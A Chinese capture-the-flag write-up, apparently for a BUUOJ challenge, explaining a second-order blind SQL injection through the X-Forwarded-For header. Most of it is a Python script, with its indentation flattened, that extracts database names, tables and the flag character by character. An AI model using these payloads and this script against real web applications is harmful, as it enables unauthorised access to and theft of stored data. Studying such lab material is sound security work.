题目
知识点
- X-Forwarded-For注入
- 二次注入
- 盲注
看了wp,知道注入点在X-Forwarded-For处,而且是个二次注入
回显的地方在这里
我们第一次输入
<pre>1' or '1</pre>
第二次和第三次都输入相同的数据,比如111
由于第一次输入的1' or '1和第二次输入的111不一样,回显
此时1' or '1 已经存入数据库中,而且111与1' or '1不一样,所以服务器不会从数据库里查找1' or '1,而是直接把上次的IP显示出来
当我们再输入一次111,即第三次的输入。此时的111与前面输入的111相同,相当于模拟ip不再变化,此时服务器要从数据库中查111的last ip,就会执行 1' or '1
贴一下代码,注意flag不在当前数据库中
# coding:utf-8
import requests
import time
url = 'http://node3.buuoj.cn:25869/'
res = ''
for i in range(1,200):
print(i)
left = 31
right = 127
mid = left + ((right - left)>>1)
while left < right:
#payload = "0' or (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{}) or '0".format(i,mid)
#payload = "0' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'F4l9_D4t4B45e'),{},1))>{}) or '0".format(i,mid)
#payload = "0' or (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'F4l9_t4b1e'),{},1))>{}) or '0".format(i,mid)
payload = "0' or (ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))>{}) or '0".format(i,mid)
headers = {
'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
'X-Forwarded-For': payload
}
r = requests.post(url = url, headers = headers)
payload = '111'
headers = {
'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
'X-Forwarded-For': payload
}
r = requests.post(url = url, headers = headers)
payload = '111'
headers = {
'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
'X-Forwarded-For': payload
}
r = requests.post(url = url, headers = headers)
if r.status_code == 429:
print('too fast')
time.sleep(2)
if 'Last Ip: 1' in r.text:
left = mid + 1
elif 'Last Ip: 1' not in r.text:
right = mid
mid = left + ((right-left)>>1)
if mid == 31 or mid == 127:
break
res += chr(mid)
print(str(mid),res)
time.sleep(1)
# information_schema,ctftraining,mysql,performance_schema,test,ctf,F4l9_D4t4B45e
#F4l9_t4b1e
#F4l9_C01uMn